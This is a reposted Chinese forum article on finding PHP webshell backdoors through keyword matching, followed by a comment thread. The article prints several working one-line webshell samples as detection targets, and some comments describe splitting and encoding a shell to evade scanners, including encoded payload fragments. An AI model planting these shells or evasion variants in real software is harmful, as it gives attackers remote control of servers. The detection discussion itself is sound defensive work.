如何查找php木马后门高级篇

admin 2021年4月2日20:18:22评论46 views字数 3089阅读10分17秒阅读模式

如何查找php木马后门高级篇

jusker (爱好后门后门分析) | 2014-05-17 11:54

# 在正常的编程中eval不常见,可通过字符串匹配查找eval

常见的是变成

base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=) #同样匹配这个base64_decode,找到文件之后查看文件内容

这种形式可以绕过,另外还有其他形式

#同样这断你可以如果一个文件中出现eval,或者文件中同时出现$_GET $_POST则输出文

件位置

if(key($_GET)=='singyea')call_user_func($_GET['singyea'],$_POST['singyea']);

#这几种就比较猥琐

test.php?a=assert

密码b

#直接匹配assert

#匹配文件中同时拥有两个POST的直接输出文件位置

密码cmd 菜刀配置信息填:iso=assert

preg_replace("/[pageerror]/e",$_POST['error'],"saft"); #这种就是同时一个文件里有preg_replace 跟POST直接输出文件位置然后手工查找

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null); 与上面一样的匹配方式

$s = create_function('', $_REQUEST['c']);

$s();

// s.php?c=eval%28$_REQUEST[cmd]%29;&cmd=echo%201;

?>

对于webshell的一句话查杀只需要找到以上基本就可以解决

然后对于大马来说有fread,fwrite,mkdir,system,eval,basename一些函数,可查php filesystem函数,如果有这个函数匹配是否存可以代码

最后一个就是查找fsocket跟socket函数

这个是用来查打流量的函数ddos之类

[原文地址]

相关内容:

如何查找php木马后门高级篇

快速查找php后门初级篇

当PHP一句话遇到exit(),看我如何把渣渣转化为鸡肋

一句话"的艺术——简单的编码和变形绕过检测

完美扫描PHP特殊一句话后门

我使用的PHP一句话的姿态

php图片木马绕过图片缩放、压缩、二次转码等“破坏性”过滤

那些强悍的PHP一句话后门

用.htaccess做更隐蔽的后门,另类PHP后门

关于php后门的编写

一句话木马大全 - 整理的比较全的一句话后门代码

PHP Web 木马扫描器 - 安全测试工具

《Code Injection》 - PHP Eval 代码注入执行

一句话木马大全

相关讨论:

1#

冷冷的夜 (预备唱:希望你过的没我好,死得比我早,吃不好也睡不) | 2014-05-17 12:00

http://zone.wooyun.org/content/2975 php太灵活了,这种文本匹配关键词很容易被Bypass,像什么大眼小眼的系统都是匹配数据包的特征字符

2#

jusker (爱好后门后门分析) | 2014-05-17 12:02

@冷冷的夜 可以如果出现慢慢看还有终极篇,这一篇就是如果出现'e'.'v'.'a'.'l'只需要用str_replace替换然后匹配就可以,接下来请看终极篇

3#

jusker (爱好后门后门分析) | 2014-05-17 12:05

@冷冷的夜 我的最新想法就是借用php环境输出$变量的值,然后通过匹配输出值,来判断是不是木马

4#

erevus (我的乌云币都在小号上,小号不是绑定我QQ,别盗我号) | 2014-05-17 14:50

$function($_POST['123']);

5#

YwiSax | 2014-05-17 17:01

基于语法来分析后门才靠谱点吧。参考http://www.cnxct.com/pecker-scanner/

6#

jusker (爱好后门后门分析) | 2014-05-17 18:42

@erevus 你这个用正则就能匹配

7#

jusker (爱好后门后门分析) | 2014-05-17 18:44

@YwiSax 恩看看

8#

/fd (madafaka #swag #yolo) | 2014-05-17 18:45

@jusker 你肯定?

9#

jusker (爱好后门后门分析) | 2014-05-17 18:46

@/fd yes

10#

jusker (爱好后门后门分析) | 2014-05-17 18:47

@YwiSax 详情请看终极篇

11#

jusker (爱好后门后门分析) | 2014-05-17 18:49

@YwiSax 你看看他参考http://www.cnxct.com/pecker-scanner/ 也是匹配eval、、、、、、都是一样的方法。。我的不同点就是终极篇,看看这个思想

12#

LaiX ([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+) | 2014-05-17 18:57

杂乱无章

13#

YwiSax | 2014-05-17 21:47

@jusker 不是呢。Pecker主要是用token_get_all来解析php的语法,然后对其分析。跟你说的文本匹配有区别的。建议你先下载作者的源码还有阅读下Pecker/Lexer.php。

14#

jusker (爱好后门后门分析) | 2014-05-17 23:25

@YwiSax 我的终极篇,思路就是$符号来匹配的

15#

jusker (爱好后门后门分析) | 2014-05-17 23:25

@YwiSax 好,马上看

16#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-05-19 09:15

php太灵活了,这种文本匹配关键词很容易被Bypass +1

17#

RedFree (?1:1 1-1-1112 |※(器杀制自) | 2014-05-19 10:31

小马杀不尽,春风吹又生。高级些的PHP木马非人工检查不能杀之也……

18#

jusker (爱好后门后门分析) | 2014-05-19 17:36

@核攻击 借用php环境说出$变量的值、、、最近在考虑这个思想

留言评论(旧系统):

flowind @ 2014-05-21 03:06:48

我这有个修改版本 唯一的特征字str_replace...
但是str_replace这个很多正常的文件都在使用..
将上面的变量分布在各个文件当中.然后include.最后在一个正常的文件调用$saf21();这句就好.
还可以将变量加密采用$_post提交..这个小马就解密代码就好..
100%防查杀.防查找...不是完整的看代码..完全找不到..
现在很多shell都通过异或来计算.但是通过^这个关键字弄个正则来找还是非常容易找到.

本站回复:


这个变态的玩意儿,无关键词:http://lcx.cc/?i=3511

flowind @ 2014-05-21 18:04:09

你说的这个shell真的非常彪悍.但是如果遇到比较牛13的包检测.
还的扩展.
$oskl2="UUdWMllXd";
$gkst3="29KRjlRVDFOVVd5ZDBaWE4wSjEw";
$hbkw1="cE93P";
$rcxh1="T0=";
这个还可以在修改弄个加密函数.
后面在解密.这样虽然复杂性加大但是安全性能大大增加.

本站回复:

嗯,这个不错!

文章来源于lcx.cc:如何查找php木马后门高级篇

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:18:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   如何查找php木马后门高级篇https://cn-sec.com/archives/317100.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息